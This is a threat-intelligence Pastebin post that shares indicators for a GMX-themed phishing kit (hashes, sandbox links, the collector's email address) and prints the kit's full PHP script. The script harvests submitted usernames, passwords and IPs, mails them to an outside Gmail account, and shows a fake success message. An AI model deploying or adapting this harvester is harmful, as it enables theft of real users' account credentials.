Advertisement
Neonprimetime

2018-01-08 uucheprecious@gmail.com

Dec 30th, 2018
2,961
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.15 KB | None | 0 0
  1. #phishingkit
  2. #threatactoremail
  3. from
  4. 1/8/2018
  5.  
  6. https://www.virustotal.com/#/file/ed425766210a721dd59f6a0e8a55fe492000e5743b1809b7da0479e37272faa5/detection
  7.  
  8. md5 9f912f53b0d364137e31e90663a1d8d3
  9. g[.]zip
  10.  
  11. I put the zip out here on app any run
  12.  
  13. https://app.any.run/tasks/a99850f3-73d8-4c77-9a1a-391c55aa00c1
  14.  
  15.  
  16.  
  17.  
  18. ---------
  19.  
  20.  
  21. <?
  22.  
  23. $ip = getenv("REMOTE_ADDR");
  24. $message .= "--Coded by vikky_banti----\n";
  25. $message .= "Username or Email : ".$_POST['username']."\n";
  26. $message .= "Password : ".$_POST['password']."\n";
  27. $message .= "--------------------\n";
  28. $message .= "IP: ".$ip."\n";
  29. $message .= "Country: ".$country."\n";
  30. $message .= "----Coded by Vikky_banti----------------\n";
  31.  
  32.  
  33.  
  34. $recipient = "uucheprecious@gmail.com";
  35. $subject = "GMX R3SuLt";
  36. $headers = "From: GMX";
  37. $headers .= $_POST['eMailAdd']."\n";
  38. $headers .= "MIME-Version: 1.0\n";
  39. mail("", "GMX", $message);
  40. if (mail($recipient,$subject,$message,$headers))
  41.  
  42. {
  43. ?>
  44.  
  45. <script language=javascript>
  46. alert('Account Successfully Update');
  47. window.location='http://www.GMX.com';
  48. </script>
  49. <?
  50.  
  51. }
  52. else
  53. {
  54. echo "ERROR! Please go back and try again.";
  55. }
  56.  
  57. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement